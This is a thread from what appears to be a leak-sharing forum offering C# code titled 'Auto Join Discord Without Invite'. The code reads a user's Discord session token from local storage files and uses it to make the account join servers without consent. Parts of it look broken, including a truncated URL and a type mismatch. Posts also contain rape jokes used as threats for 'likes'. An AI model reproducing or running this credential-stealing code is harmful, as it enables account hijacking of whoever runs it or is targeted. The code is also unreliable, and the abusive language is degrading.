• 📢 Notice: Our community has moved to Zelo.cx! Visit us at Zelo.cx for the latest updates and discussions.

Auto Join Discord Without Invite

Extraordinary

Premium member
Premium
Rep
0
0
0
Rep
827
Vouches
0
0
0
Vouches
0
Posts
782
Likes
287
2 YEARS
2 YEARS OF SERVICE
This is Leak/Release


[HIDE] public static void Join(string serverID) { HttpWebRequest discordRequest = (HttpWebRequest)WebRequest.Create($"https://discordapp.c...e/{serverID}"); discordRequest.Method = "POST"; discordRequest.UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0"; discordRequest.AutomaticDecompression = DecompressionMethods.GZip; discordRequest.Headers.Add("Authorization", DiscordToken()); discordRequest.ContentLength = 0; var response = (HttpWebResponse)discordRequest.GetResponse(); } static string DiscordToken() { string file = $"C:\\Users\\{Environment.UserName}\\AppData\\Roaming\\discord\\Local Storage\\https_discordapp.com_0.localstorage"; StringBuilder remControlChar = new StringBuilder(256); using (SQLiteConnection conn = new SQLiteConnection($"data source={file}")) { using (SQLiteCommand comm = new SQLiteCommand("SELECT key, value FROM ItemTable", conn)) { conn.Open(); SQLiteDataReader reader = comm.ExecuteReader(); while (reader.Read()) { if ((string)reader["Key"] == "token") { string tokenReturn = Encoding.Default.GetString((byte[])reader["Value"]).Replace('\"', ' '); char singleCharacter; for (int i = 0; i < tokenReturn.Length; i++) { singleCharacter = tokenReturn; if (!char.IsControl(singleCharacter)) { remControlChar.Append(singleCharacter); } } } } reader.Close(); conn.Close(); } } return $"{remControlChar}"; }
[/HIDE]


Like or i rape you
This leak has been rated as working 0 times this month. (1 times in total)
This leak has been rated as not working 0 times this month. (2 times in total)
This leak has been rated as infected 0 times this month. (1 times in total)
 

MrSihag

Premium member
Premium
Rep
0
0
0
Rep
0
Vouches
0
0
0
Vouches
0
Posts
26
Likes
0
Bits
3 YEARS
3 YEARS OF SERVICE
It's look too good
 

Extraordinary

Premium member
Premium
Rep
0
0
0
Rep
827
Vouches
0
0
0
Vouches
0
Posts
782
Likes
287
2 YEARS
2 YEARS OF SERVICE
(29 January, 2020 - 05:35 PM)jonsnowy Wrote: Show More
can you explain?

Its c# integrated with php http
yes
[Image: FtiXiFX.gif]
 

hoteti2294

Member
Rep
0
0
0
Rep
0
Vouches
0
0
0
Vouches
0
Posts
26
Likes
0
Bits
2 YEARS
2 YEARS OF SERVICE
I like so please don't rape me
 

48,736

38,247

238,888

Top